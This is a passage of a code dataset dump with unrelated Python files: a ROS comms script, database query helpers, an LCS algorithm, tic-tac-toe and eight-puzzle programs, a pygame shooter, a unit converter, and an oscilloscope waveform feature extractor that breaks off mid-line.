rospy.Rate(10)\n\n while not rospy.is_shutdown():\n socket_listen(end_mission_pub)\n rate.sleep()\n\nif __name__=='__main__':\n comms_main()\n","sub_path":"communications/scripts/batman_demo_group1_comms.py","file_name":"batman_demo_group1_comms.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381455705","text":"import os\nfrom sqlalchemy.inspection import inspect\n\nfrom sickkidsproj import app, db\nfrom sickkidsproj.database.models import ExonReadsMapping, GeneReadsMapping\nfrom sickkidsproj.utils.check import isEnsemblId\n\ndef get_exonexpr_storepath(ensembl_id):\n \"\"\" Quries ExonReadsMapping and returns \n corersponding storepath for ggiven ensemblId\n\n @param str ensemblId\n @rType str storepath: under exon_expr/\n return None if not found\n \"\"\"\n mapping = ExonReadsMapping.query \\\n .filter_by(ensembl_id = ensembl_id) \\\n .first()\n\n if mapping:\n return os.path.realpath(\n os.path.join(app.config['DATA_RESOURCES_DIR'], \n mapping.store_path))\n\n\ndef get_geneexpr_storepath(ensembl_id):\n \"\"\" Quries GeneReadsMapping and returns \n corersponding storepath for ggiven ensemblId\n\n @param str ensemblId\n @rType str storepath: under gene_expr/\n return None if not found\n \"\"\"\n mapping = GeneReadsMapping.query \\\n .filter_by(ensembl_id = ensembl_id) \\\n .first()\n\n if mapping:\n return os.path.realpath(\n os.path.join(app.config['DATA_RESOURCES_DIR'], \n mapping.store_path))\n\n\ndef get_all_exonreadsmapping_keys():\n \"\"\" Queries ExonReadsMapping and returns a list of keys\n\n @rType: [ ..., int ] \n \"\"\"\n query = db.session.query(GeneReadsMapping.ensembl_id.distinct())\n\n ensembl_ids = []\n for l in query.all():\n if len(l) == 1 and isEnsemblId(l[0]):\n ensembl_ids.append(l[0])\n return ensembl_ids\n\n\n\n\n\n","sub_path":"sickkidsproj/database/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"305201772","text":"from .views import *\nfrom django.test import TestCase\nfrom django.db import models\nfrom django.db.models import get_app\nfrom datetime import date\n\nclass SimpleTest(TestCase):\n def test_objects_creation(self):\n app = get_app('main')\n mds = models.get_models(app)\n\n for model in mds:\n model = model()\n for field in model._meta.fields:\n if field.__class__ == models.CharField:\n setattr(model,field.name,'Test')\n elif field.__class__ == models.IntegerField:\n setattr(model,field.name,1)\n elif field.__class__ == models.DateField:\n setattr(model,field.name,date.today())\n model.save()\n","sub_path":"main/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"537659903","text":"\"\"\"\n\tLongest common subsequence\n\tO(n m) time, O(n m) space\n\"\"\"\nimport sys\n\ndef lcsseq(a, b):\n\tn, m = len(a), len(b)\n\topt = [ (m+1)*[0] for i in range(0,n+1) ]\n\tsol = [ (m+1)*[None] for i in range(0,n+1) ]\n\tfor i in range(0,n+1): sol[i][0] = 'R'\n\tfor j in range(0,m+1): sol[0][j] = 'C'\n\tfor i in range(1,n+1):\n\t\tfor j in range(1,m+1):\n\t\t\tif a[i-1] == b[j-1]:\n\t\t\t\topt[i][j] = opt[i-1][j-1] + 1\n\t\t\telse:\n\t\t\t\topt[i][j] = max( opt[i-1][j], opt[i][j-1] )\n\t\t\tif opt[i][j] == opt[i-1][j]:\n\t\t\t\tsol[i][j] = 'R' # skip a symbol from a (skip a row)\n\t\t\telif opt[i][j] == opt[i][j-1]:\n\t\t\t\tsol[i][j] = 'C' # skip a symbol from b (skip a column)\n\t\t\telse:\n\t\t\t\tsol[i][j] = 'M' # match\n\tlength = opt[n][m]\n\t# Trace back the transcript\n\ttranscript = []\n\twhile n > 0 or m > 0: \n\t\ttranscript.append(sol[n][m])\n\t\tif sol[n][m] == 'R': n -= 1\n\t\telif sol[n][m] == 'C': m -= 1\n\t\telse:\n\t\t\tn -= 1\n\t\t\tm -= 1\n\treturn length, transcript[::-1]\n\ndef some_lcsseq(a, b): \n\ti, j = 0, 0\n\t_, T = lcsseq(a, b)\n\tc = []\n\tfor t in T:\n\t\tif t == 'R': i += 1\n\t\telif t == 'C': j += 1\n\t\telse: \n\t\t\tc.append(a[i])\n\t\t\ti += 1\n\t\t\tj += 1\n\treturn ''.join(c)\n\ndef main():\n\tfor line in sys.stdin:\n\t\ta, b = line.strip().split()\n\t\tprint(some_lcsseq(a, b))\n\nif __name__ == \"__main__\": main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"LCSSEQ.py","file_name":"LCSSEQ.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154051042","text":"#!/usr/bin/python\n\nfrom random import choice\n\nfrom Board import Board\nfrom Evaluation import Evaluation\n\nclass AI:\n def __init__(self, player, board):\n player = 'X' if player not in ['X', 'O'] else player\n self.player = player\n self.otherPlayer = 'O' if player == 'X' else 'X'\n self.board = board\n\n def __generateBoards(self):\n return {option:Board(self.board.fetch(), self.board.getPlayer()).move(option) for option in self.board.validPositions()}\n\n def __isFirstMove(self):\n if self.board.isEmpty():\n return True\n return False\n\n # A corner or the center is the best starting move\n def __selectFirstMove(self):\n return choice([1, 3, 5, 7, 9])\n \n def __isSecondMove(self):\n if len(self.board.validPositions()) == 8:\n return True\n return False\n\n # If the opponent has taken the center, pick a corner,\n # If the opponent has taken a corner, take the center\n # otherwise pick a corner or the center\n def __selectSecondMove(self):\n validMoves = self.board.validPositions()\n if 5 not in validMoves:\n return choice([1, 3, 7, 9])\n if len([pos for pos in [1, 3, 7, 9] if pos not in validMoves]) != 0:\n return 5\n return choice([1, 3, 5, 7, 9])\n \n def __findWinner(self, boards):\n for (option, board) in boards.items():\n e = Evaluation(board)\n if e.winner() == self.player:\n return option\n return None\n\n def __mustBlock(self):\n for move in self.board.validPositions():\n test = Board(self.board.fetch(), self.otherPlayer).move(move)\n evaluation = Evaluation(test)\n if evaluation.winner() == self.otherPlayer:\n return move\n return None\n\n def __wouldWin(self, board):\n for move in board.validPositions():\n test = Board(board.fetch(), self.player).move(move)\n evaluation = Evaluation(test)\n if evaluation.winner() == self.player:\n return True\n return False\n\n def __countLosingMoves(self, board):\n count = 0\n for move in board.validPositions():\n test = Board(board.fetch(), self.otherPlayer).move(move)\n evaluation = Evaluation(test)\n if evaluation.winner() == self.otherPlayer:\n count = count + 1\n return count\n\n def __countBlocks(self, board):\n maxCount = 0\n for move in board.validPositions():\n test = Board(board.fetch(), self.otherPlayer).move(move)\n # if this move would allow a win, then there are no must blocks\n count = 0\n if not self.__wouldWin(test):\n count = self.__countLosingMoves(test)\n maxCount = count if count > maxCount else maxCount\n return maxCount\n\n def __multiBlockMoves(self, boards):\n multiBlockMoves = []\n for (move, board) in boards.items():\n for otherMove in board.validPositions():\n test = Board(board.fetch(), self.otherPlayer).move(move)\n if self.__countBlocks(test) > 1:\n multiBlockMoves = multiBlockMoves + [move]\n break\n return multiBlockMoves\n\n def __noMultiBlockMoves(self, boards):\n multiBlockMoves = self.__multiBlockMoves(boards)\n return [move for move in boards.keys() if move not in multiBlockMoves]\n \n def __selectBestMove(self):\n if self.__isFirstMove():\n return self.__selectFirstMove()\n if self.__isSecondMove():\n return self.__selectSecondMove()\n boards = self.__generateBoards()\n win = self.__findWinner(boards)\n if win != None:\n return win\n mustBlock = self.__mustBlock()\n if mustBlock != None:\n return mustBlock\n noMultiBlockMoves = self.__noMultiBlockMoves(boards)\n if noMultiBlockMoves != []:\n return choice(noMultiBlockMoves)\n # somehow, all moves are multiblock moves, and this fails\n # this should be impossible to reach\n return choice(self.board.validPositions()) \n \n def makeMove(self):\n self.board.move(self.__selectBestMove())\n","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179843675","text":"# coding: utf-8\n\nimport string\nimport numpy as np\nimport time\n\n\nclass EightDigits:\n\n def __init__(self):\n self._history = []\n while True:\n self._puzzle = np.random.permutation(9).reshape((3, 3))\n self._zero = np.argwhere(self._puzzle==0).flatten()\n if self.solution_exist(\\\n np.delete(self._puzzle, self._zero[0]*3 + self._zero[1], None)):\n return\n\n @classmethod\n def solution_exist(self, puzzle):\n reverse = 0\n for idx, val in enumerate(puzzle):\n for prev in puzzle[:idx]:\n if prev > val:\n reverse += 1\n return not (reverse & 1)\n\n @property\n def history(self):\n return self._history\n\n def move_back(self, deep=None):\n deep = deep or len(self._history)\n while deep > 0 and len(self._history) > 0:\n step = self._history.pop()\n self.move(-step, record=False)\n deep -= 1\n return self\n\n def move(self, step=None, record=True):\n puzzle = self._puzzle\n zero = self._zero\n step = np.array(step)\n dest = zero + step\n if dest[0] not in [0, 1, 2] or dest[1] not in [0, 1, 2]:\n return self\n puzzle[zero[0], zero[1]] = puzzle[dest[0], dest[1]]\n puzzle[dest[0], dest[1]] = '0'\n self._zero = dest\n self._puzzle = puzzle\n if record:\n self._history.append(step)\n return self\n\n def distance(self):\n ret = 0\n for row in range(3):\n for col in range(3):\n v = (self._puzzle[row, col] + 8) % 9\n ret += (row - v / 3)**2 + (col - v % 3)**2\n return ret\n\n def win(self):\n return self.distance() == 0\n\n def __str__(self):\n return '\\n'.join([' '.join([str(cell) for cell in line]) \\\n for line in self._puzzle.tolist()])\n\n","sub_path":"puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"437761521","text":"import turtle as t\r\nimport time as ti\r\n\r\n\r\ndef circle(a):\r\n while a<1000:\r\n t.speed(50)\r\n t.pencolor(\"red\")\r\n \r\n t.circle(a)\r\n t.right(25)\r\n a=a+5\r\n circle(a)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nt.bgcolor(\"black\")\r\nt.speed(\"fast\")\r\nt.pensize(4)\r\ncircle(50)\r\n\r\n # t.circle(5)\r\nti.sleep(2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nt.exitonclick()","sub_path":"KaleidoSpiral.py","file_name":"KaleidoSpiral.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2792851","text":"# -- coding: utf-8 --\nfrom __future__ import unicode_literals\nimport os\nfrom fpdf import FPDF\nimport logging\nimport csv\n\n\n__author__ = 'PyARK'\n\n# import psutil\n# print(psutil.sensors_battery())\n# print(psutil.sensors_fans())\n# print(psutil.sensors_temperatures())\n\n\nflag_first_point = 'stop'\nsize = 0\nlog_file = None\n\n\ndef config_log():\n global log_file\n\n if 'File' not in os.listdir('c:\\\\Users\\Public'):\n os.mkdir('c:\\\\Users\\Public\\File')\n # print('create DIR - FILE')\n\n log_file = logging.getLogger(\"LIB_FILE\")\n log_file.setLevel(logging.DEBUG)\n\n try:\n format_log = logging.FileHandler(\"c:\\\\Users\\Public\\File\\sample.log\")\n except:\n format_log = logging.FileHandler(\"c:\\\\Users\\Public\\sample.log\")\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n format_log.setFormatter(formatter)\n\n log_file.addHandler(format_log)\n\n\ndef write_in_file(data_str, file_name):\n\n file_measure = open(file_name, 'a')\n file_measure.write(data_str + '\\n')\n file_measure.close()\n\n\ndef write_pdf(data_str):\n pdf = FPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n pdf.set_font(\"Arial\", size=12)\n pdf.cell(200, 10, txt=\"Welcome to Python!\", ln=1, align=\"C\")\n pdf.cell(200, 10, txt=str(data_str), ln=1, align=\"C\")\n pdf.output(\"D:\\\\simple_demo.pdf\")\n # print('write')\n\n\ndef csv_dict_writer(path, fieldnames, data):\n \"\"\"\n Writes a CSV file using DictWriter\n \"\"\"\n with open(path, \"w\", newline='') as out_file:\n writer = csv.DictWriter(out_file, delimiter=',', fieldnames=fieldnames)\n writer.writeheader()\n for row in data:\n writer.writerow(row)\n\n\ndef csv_dict_reader(file_obj):\n \"\"\"\n Read a CSV file using csv.DictReader\n \"\"\"\n reader = csv.DictReader(file_obj, delimiter=',')\n for line in reader:\n print(line)\n print(line[\"first_name\"]),\n print(line[\"last_name\"])\n\n\n\n\n\n","sub_path":"Analyzer_parts/lib_file.py","file_name":"lib_file.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65688850","text":"import os\nimport cv2\nimport numpy as np\nimport pickle\n\nIMAGE_WIDTH = 352\nIMAGE_HEIGHT = 1216\n\n\nclass Dataset:\n\n def __init__(self):\n self._index_in_epoch = 0\n self._epochs_completed = 0\n self.train_image = []\n self.train_label = []\n self.test_image = []\n self.test_label = []\n self.valid_image = []\n self.valid_label = []\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/image/train/\"))\n l.sort()\n for name in l:\n img = np.asarray(cv2.imread(os.path.join(os.path.dirname(__file__), \"./data/image/train/\" + name)),\n \"float32\")\n self.train_image.append(img)\n\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/label/train/\"))\n l.sort()\n for name in l:\n label = pickle.load(open(os.path.join(os.path.dirname(__file__), \"./data/label/train/\" + name), \"rb\"),\n encoding='bytes')\n label = label.reshape(IMAGE_WIDTH, IMAGE_HEIGHT, 1)\n self.train_label.append(label)\n\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/image/test/\"))\n l.sort()\n for name in l:\n img = np.asarray(cv2.imread(os.path.join(os.path.dirname(__file__), \"./data/image/test/\" + name)),\n \"float32\")\n self.test_image.append(img)\n\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/label/test/\"))\n l.sort()\n for name in l:\n label = pickle.load(open(os.path.join(os.path.dirname(__file__), \"./data/label/test/\" + name), \"rb\"),\n encoding='bytes')\n label = label.reshape(IMAGE_WIDTH, IMAGE_HEIGHT, 1)\n self.test_label.append(label)\n\n self.test_image = np.asarray(self.test_image[:])\n self.test_label = np.asarray(self.test_label[:])\n self.valid_image = np.asarray(self.train_image[199:])\n self.valid_label = np.asarray(self.train_label[199:])\n self.train_image = np.asarray(self.train_image[:199])\n self.train_label = np.asarray(self.train_label[:199])\n self._num_examples = self.train_image.shape[0]\n\n def next_batch(self, batch_size, shuffle=True):\n start = self._index_in_epoch\n if start == 0 and self._epochs_completed == 0:\n idx = np.arange(0, self._num_examples) # get all possible indexes\n np.random.shuffle(idx) # shuffle index\n self.train_image = self.train_image[idx]\n self.train_label = self.train_label[idx]\n\n # go to the next batch\n if start + batch_size > self._num_examples:\n self._epochs_completed += 1\n self._index_in_epoch = 0\n start = 0\n self._index_in_epoch += batch_size\n end = self._index_in_epoch\n return self.train_image[start:end], self.train_label[start:end]\n\n\nif __name__ == '__main__':\n dataset = Dataset()\n print(dataset.valid_image.shape)\n","sub_path":"HW6_FCN-32/input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89393457","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 17 16:32:23 2019\r\n@author: admin\r\n\r\nPriya Bannur: Simple game using Pygame\r\n\"\"\"\r\n\r\nimport pygame\r\npygame.init()\r\n #coordinate of object is at its top left point\r\n #initializing\r\n\r\nscreenw=800\r\nscreenh=500\r\nwin = pygame.display.set_mode((screenw,screenh)) #window width=600, height=300\r\npygame.display.set_caption(\"My-Game\")\r\nclock = pygame.time.Clock()\r\n\r\nwalkRight = [pygame.image.load('R1.png'), pygame.image.load('R2.png'), pygame.image.load('R3.png'), pygame.image.load('R4.png'), pygame.image.load('R5.png'), pygame.image.load('R6.png'), pygame.image.load('R7.png'), pygame.image.load('R8.png'), pygame.image.load('R9.png')]\r\nwalkLeft = [pygame.image.load('L1.png'), pygame.image.load('L2.png'), pygame.image.load('L3.png'), pygame.image.load('L4.png'), pygame.image.load('L5.png'), pygame.image.load('L6.png'), pygame.image.load('L7.png'), pygame.image.load('L8.png'), pygame.image.load('L9.png')]\r\nbg = pygame.image.load('bg.png')\r\nchar = pygame.image.load('standing.png')\r\n\r\nclock = pygame.time.Clock()\r\n#bulletSound = pygame.mixer.Sound(\"bullet.wav\")\r\n#hitSound = pygame.mixer.Sound(\"hit.wav\")\r\nmusic = pygame.mixer.music.load(\"music.mp3\")\r\npygame.mixer.music.play(-1) # -1 will ensure the song keeps playing\r\nscore = 0 \r\n\r\nclass player(object):\r\n def __init__(self,x,y,width,height): #attributes of player\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.vel = 5\r\n self.isJump = False\r\n self.left = False\r\n self.right = True\r\n self.walkCount = 0\r\n self.jumpCount = 10\r\n self.standing = True\r\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\r\n #the elements in the hitbox are (top left x, top left y, width, height)\r\n\r\n def draw(self, win):\r\n #9 images for our walking animation, to show the same image for 3 frames\r\n #number 27 as an upper bound for walkCount because 27 / 3 = 9. \r\n #9 images shown 3 times each animation.\r\n if self.walkCount + 1 >= 27:\r\n self.walkCount = 0\r\n \r\n if not(self.standing):\r\n if self.left: #facing left\r\n win.blit(walkLeft[self.walkCount//3], (self.x,self.y))\r\n self.walkCount += 1\r\n elif self.right: #facing right\r\n win.blit(walkRight[self.walkCount//3], (self.x,self.y))\r\n self.walkCount +=1\r\n else: #standing still facing either side\r\n if self.right:\r\n win.blit(walkRight[0], (self.x, self.y))\r\n else:\r\n win.blit(walkLeft[0], (self.x, self.y))\r\n \r\n #draw hit box around the player\r\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\r\n #pygame.draw.rect(win, (255,0,0), self.hitbox,2) \r\n \r\n def hit(self):\r\n self.isJump = False\r\n self.jumpCount = 10 \r\n self.x = 60 #resetting the player position\r\n self.y = 380\r\n self.walkCount = 0\r\n font1 = pygame.font.SysFont('comicsans', 100)\r\n text = font1.render('-5', 1, (255,0,0))\r\n win.blit(text, (400,20))\r\n pygame.display.update()\r\n i = 0\r\n while i < 300:\r\n pygame.time.delay(10)\r\n i += 1\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n i = 301\r\n pygame.quit()\r\n #msg when hit for a certain period of time\r\n\r\nclass projectile(object): #bullet class\r\n def __init__(self,x,y,radius,color,facing):\r\n self.x = x\r\n self.y = y\r\n self.radius = radius\r\n self.color = color\r\n self.facing = facing #left or right\r\n self.vel = 8 * facing\r\n \r\n def draw(self,win):\r\n pygame.draw.circle(win, self.color, (self.x,self.y), self.radius)\r\n\r\n\r\nclass enemy(object):\r\n walkRight = [pygame.image.load('R1E.png'), pygame.image.load('R2E.png'), pygame.image.load('R3E.png'), pygame.image.load('R4E.png'), pygame.image.load('R5E.png'), pygame.image.load('R6E.png'), pygame.image.load('R7E.png'), pygame.image.load('R8E.png'), pygame.image.load('R9E.png'), pygame.image.load('R10E.png'), pygame.image.load('R11E.png')]\r\n walkLeft = [pygame.image.load('L1E.png'), pygame.image.load('L2E.png'), pygame.image.load('L3E.png'), pygame.image.load('L4E.png'), pygame.image.load('L5E.png'), pygame.image.load('L6E.png'), pygame.image.load('L7E.png'), pygame.image.load('L8E.png'), pygame.image.load('L9E.png'), pygame.image.load('L10E.png'), pygame.image.load('L11E.png')]\r\n \r\n def __init__(self, x, y, width, height, end):\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.path = [x, end] #where the enemy starts and finishes its path\r\n self.walkCount = 0\r\n self.vel = 3\r\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\r\n self.health = 10 \r\n self.visible = True\r\n \r\n def draw(self, win):\r\n self.move()\r\n if self.visible:\r\n if self.walkCount + 1 >= 33: #11 images for each animtion, upper bound = 33. \r\n self.walkCount = 0\r\n \r\n if self.vel > 0: #moving to the right\r\n win.blit(self.walkRight[self.walkCount//3], (self.x,self.y))\r\n self.walkCount += 1\r\n else: #else Left\r\n win.blit(self.walkLeft[self.walkCount//3], (self.x,self.y))\r\n self.walkCount += 1\r\n \r\n pygame.draw.rect(win, (255,0,0), (self.hitbox[0], self.hitbox[1] - 20, 50, 10))\r\n pygame.draw.rect(win, (0,128,0), (self.hitbox[0], self.hitbox[1] - 20, 50 - (5 * (10 - self.health)), 10)) \r\n #draw hit box around the enemy\r\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\r\n #pygame.draw.rect(win, (255,0,0), self.hitbox,2) \r\n \r\n def move(self):\r\n if self.vel > 0: #moving right\r\n if self.x < self.path[1] + self.vel: #if not right end of path\r\n self.x += self.vel\r\n else: #if end reached\r\n self.vel = self.vel * -1\r\n self.x += self.vel\r\n self.walkCount = 0\r\n else: #moving left\r\n if self.x > self.path[0] - self.vel: #if not left end of path\r\n self.x += self.vel\r\n else: #if end reached\r\n self.vel = self.vel * -1\r\n self.x += self.vel\r\n self.walkCount = 0 \r\n \r\n def hit(self): #when enemy is hit\r\n #hitSound.play()\r\n if self.health > 0:\r\n self.health -= 1\r\n else:\r\n self.visible = False\r\n print('hit') \r\n\r\ndef redrawGameWindow():\r\n win.blit(bg, (0,0))\r\n text = font.render(\"Score: \" + str(score), 1, (0,0,0)) \r\n #text, anti-aliasing, color\r\n win.blit(text, (680, 10))\r\n man.draw(win)\r\n goblin.draw(win)\r\n for bullet in bullets:\r\n bullet.draw(win)\r\n pygame.display.update()\r\n \r\n################################################################################################# \r\n #mainloop\r\nfont = pygame.font.SysFont(\"comicsans\", 30, True)\r\n #Bold set True\r\nman = player(10, 380, 64, 64) #creating instances\r\ngoblin = enemy(100, 380, 64, 64, 600)\r\nshootLoop=0\r\nrun = True\r\nbullets = [] \r\nwhile run:\r\n clock.tick(27)\r\n \r\n if goblin.visible == True:\r\n if man.hitbox[1] < goblin.hitbox[1] + goblin.hitbox[3] and man.hitbox[1] + man.hitbox[3] > goblin.hitbox[1]:\r\n if man.hitbox[0] + man.hitbox[2] > goblin.hitbox[0] and man.hitbox[0] < goblin.hitbox[0] + goblin.hitbox[2]:\r\n man.hit()\r\n score -= 5 #reducing score if enemy hits player\r\n\r\n if shootLoop > 0:\r\n shootLoop += 1\r\n if shootLoop > 3:\r\n shootLoop = 0\r\n \r\n for event in pygame.event.get(): #loop through key actions\r\n if event.type == pygame.QUIT: #game exit\r\n run = False\r\n \r\n for bullet in bullets: #checks x & y coords\r\n if bullet.y - bullet.radius < goblin.hitbox[1] + goblin.hitbox[3] and bullet.y + bullet.radius > goblin.hitbox[1]:\r\n if bullet.x + bullet.radius > goblin.hitbox[0] and bullet.x - bullet.radius < goblin.hitbox[0] + goblin.hitbox[2]:\r\n if goblin.visible == True:\r\n goblin.hit() #calls enemy hit method\r\n score += 1\r\n bullets.pop(bullets.index(bullet))\r\n #remove bullet from bullet list\r\n \r\n if bullet.x < screenw and bullet.x > 0:\r\n bullet.x += bullet.vel #moves the bullet by its vel\r\n else:\r\n bullets.pop(bullets.index(bullet)) #remove the bullet if it is off the screen\r\n\r\n keys = pygame.key.get_pressed() #returns a dictonary where 1= key pressed and 0= key not pressed.\r\n\r\n if keys[pygame.K_SPACE] and shootLoop==0: #code to shoot bullets\r\n #bulletSound.play()\r\n if man.left:\r\n facing = -1\r\n else:\r\n facing = 1\r\n \r\n if len(bullets) < 5: #make sure we cannot exceed 5 bullets on the screen at once\r\n bullets.append(projectile(round(man.x+man.width//2), round(man.y + man.height//2), 6, (0,0,0), facing)) \r\n #create a bullet starting at the middle of the character\r\n shootLoop = 1\r\n \r\n \r\n if keys[pygame.K_LEFT] and man.x > man.vel:\r\n man.x -= man.vel\r\n man.left = True\r\n man.right = False\r\n man.standing = False\r\n elif keys[pygame.K_RIGHT] and man.x < screenw - man.width - man.vel:\r\n man.x += man.vel\r\n man.right = True\r\n man.left = False\r\n man.standing = False\r\n else:\r\n man.standing = True\r\n man.walkCount = 0\r\n \r\n if not(man.isJump):\r\n if keys[pygame.K_UP]: \r\n man.isJump = True\r\n man.right = True\r\n man.left = False\r\n man.walkCount = 0\r\n else: \r\n if man.jumpCount >= -10: #code to jump\r\n neg = 1\r\n if man.jumpCount < 0:\r\n neg = -1\r\n man.y -= (man.jumpCount ** 2) * 0.5 * neg\r\n man.jumpCount -= 1\r\n else:\r\n man.isJump = False\r\n man.jumpCount = 10\r\n \r\n redrawGameWindow()\r\n\r\npygame.quit() #game closed when while loop exited","sub_path":"mygame.py","file_name":"mygame.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138235034","text":"# this is my second program\n# This program will get input on the users.\n# This program will also convert their height\n\n# get the user name\nname = raw_input('please input your name ')\nfull_name = str(name)\nprint ('Hello ' + full_name)\n\n# get the user height\nheight = raw_input('please input your height in cm: ')\nheight = int(height) * 0.01\n#print('your height in m is: ' + str(height) + ' m')\nprint('your height in m is: ' + str(\"{:.2f}\".format(height)) + ' m')\n#{:.2f}\".format())\n\n\n# convert the user height\nheight_in_feet = height * 3.281\nheight_in_feet = round(height_in_feet, 2 )\nprint ('your height in feet is ' + str(height_in_feet) + ' feet ')\n\n\n# get the user weight\nweight = raw_input('please input your weight in kg: ')\nprint('your wight in kg is: ' + str(weight) + ' kg')\n\nweight_in_stone = int(weight) * 0.15747304441777 \nweight_in_stone = round(weight_in_stone, 2 )\nprint('your weight_in_stone is ' + str(weight_in_stone) + ' stone')\n","sub_path":"Archive/convert_weight.py","file_name":"convert_weight.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646295761","text":"#! /usr/bin/python\n\n# This is a script to extract:\n# pulse_height\n# pulse_position\n# fwhm (FWHM)\n# baseline_mean\n# baseline_stddev\n# signal_to_noise (ratio)\n# from the csv waveform data of an Tektronix DPO 4104B Oscilloscope\n\n# import needed libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\n\n# print arguments of the script\nprint(\"This is: \" + sys.argv[0])\nprint(\"path to data folder: \" + sys.argv[1])\nprint(\"lower dataset number: \" + sys.argv[2])\nprint(\"upper dataset number: \" + sys.argv[3])\nprint(\"pulse type (high/low): \" + sys.argv[4])\nprint(\"HV [V]: \" + sys.argv[5])\n\n# open file to write results to\ntry:\n path = sys.argv[1] + \"event_features_\" + str(sys.argv[4]) + \"Pulse_HV\" + str(sys.argv[5]) + \".csv\"\n result_file = open(path, \"w+\") # write plus create new file if not existent yet\n\n ch_list = [\"time\",\"ch0\",\"ch1\",\"ch2\",\"ch3\"]\n header_string = \"\"\n units_string = \"\"\n for channel in range(1,5):\n result_string = \"pulse_height_\" + ch_list[channel] + \",pulse_position_\" + ch_list[channel] + \",FWHM_\" + ch_list[channel]\n result_string = result_string + \",baseline_mean_\" + ch_list[channel] + \",baseline_stddev_\" + ch_list[channel] + \",signal_to_noise_\" + ch_list[channel]\n header_string = header_string + \",\" + result_string\n\n units_string = \"V,index a.u.,index a.u.,V,V,none,\"\n units_string = 4 * units_string\n units_string = units_string[:-1] # get rid of the last comma\n header_string += \"\\n\"\n units_string += \"\\n\"\n # write header and units line to file\n result_file.write(header_string)\n result_file.write(units_string)\nexcept:\n print(\"ERROR\")\n print(\"file: \" + path)\n print(\"cannot be opened or is not writable\")\n sys.exit() # terminate the programm if result file cannot be opened\n\n# import specified datasets with pandas\ndataset = int(sys.argv[2])\nmaxdataset = int(sys.argv[3]) + 1\nwhile (dataset < maxdataset):\n path = sys.argv[1] + \"tek\" + str(dataset).zfill(4) + \"ALL.csv\"\n dataframe = pd.read_csv(path, skiprows = 17)\n dataframe.columns = ch_list\n time_arb = np.arange(0, len(dataframe[\"time\"]))\n print(\"--- imported: \" + path)\n\n result_string = \"\"\n for channel in range(1, 5):\n # calculate values of interest\n pulse_height = 1000 # sufficient high value that is certainly higher than any signal\n pulse_position = 0\n fwhm = 0\n baseline_mean = 0\n baseline_stddev = 0\n baseline_sample = 0\n signal_to_noise = 0\n for row in range(0,len(dataframe[\"time\"])):\n value = dataframe.iloc[row, channel]\n\n # pulse_height\n if (value < pulse_height): # smallest value, because pulses are inverted\n pulse_height = value\n pulse_position = row\n\n # baseline evaluation\n if (row < 4500 or row > 5700):\n baseline_mean += value\n baseline_stddev += value*value\n baseline_sample += 1\n\n baseline_mean = baseline_mean/baseline_sample\n baseline_stddev = np.sqrt(baseline_stddev/baseline_sample - baseline_mean*baseline_mean) # more like RMS\n pulse_height = abs(pulse_height - baseline_mean)\n signal_to_noise = pulse_height/baseline_stddev\n #print(pulse_position)\n\n # FWHM\n fwhm_crit = baseline_mean - 0.5*pulse_height\n # left intersection\n for shift in range(1, 300):\n row = pulse_position - shift\n #print(row)\n value = dataframe.iloc[row, channel]\n prev_value = dataframe.iloc[row + 1, channel]\n\n if (value > fwhm_crit):\n shift = shift - abs(value-fwhm_crit)/abs(value-prev_value) # linear interpolation\n fwhm += shift\n break\n\n # right intersection\n for shift in range(1, 300):\n row = pulse_position + shift\n value = dataframe.iloc[row, channel]\n prev_value = dataframe.iloc[row - 1, channel]\n\n if (value > fwhm_crit):\n #print(value)\n #print(prev_value)\n if (value != prev_value): # linear interpolation if value and prev_value are unequal\n shift = shift - 